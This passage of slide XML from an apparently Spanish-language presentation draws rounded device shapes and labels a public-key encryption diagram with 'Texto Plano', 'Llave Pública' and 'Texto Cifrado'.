                  <a:pt x="4480182" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472955" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294927" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250404" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197219" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41304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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591532" y="306164"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="349738" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197217" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250400" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294923" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="351298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294899" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250206" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196564" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2495180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="0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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468194" y="1160338"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="5163947" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468194" y="1160338"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="139377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5163947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="0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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661453" y="376086"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="3700232" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="314712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254091" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206031" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165992" y="6480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15360" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="205857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="253503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6485" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205857" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253503" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313320" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759461" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807520" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847556" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013537" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007061" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807694" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760049" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370023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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661453" y="376086"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="313309" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3700232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760043" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807686" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847572" y="6477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="314702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007066" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807512" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759455" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253499" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205856" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165970" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15353" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2065120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="253499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="205856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6477" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206030" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254086" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="0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7" name="Google Shape;297;p23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5032581" y="729613"/>
            <a:ext cx="864300" cy="0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8" name="Google Shape;298;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2076900" y="214350"/>
            <a:ext cx="29355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400">
                <a:solidFill>
                  <a:schemeClr val="dk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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Texto Plano </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Llave Pública</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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9" name="Google Shape;299;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5839900" y="532200"/>
            <a:ext cx="29355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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Texto Cifrado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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0" name="Google Shape;300;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7219502" y="3811364"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="4130450" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7228" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7237" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196565" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250210" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294903" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472964" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480182" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472955" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294927" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250404" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197219" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41304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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7219502" y="3811364"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="349738" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197217" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250400" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294923" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="351298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294899" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250206" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196564" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2495180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="0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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098008" y="4665538"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="5163947" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139377" y="0"/>
                </a:lnTo>
                <a:lnTo>
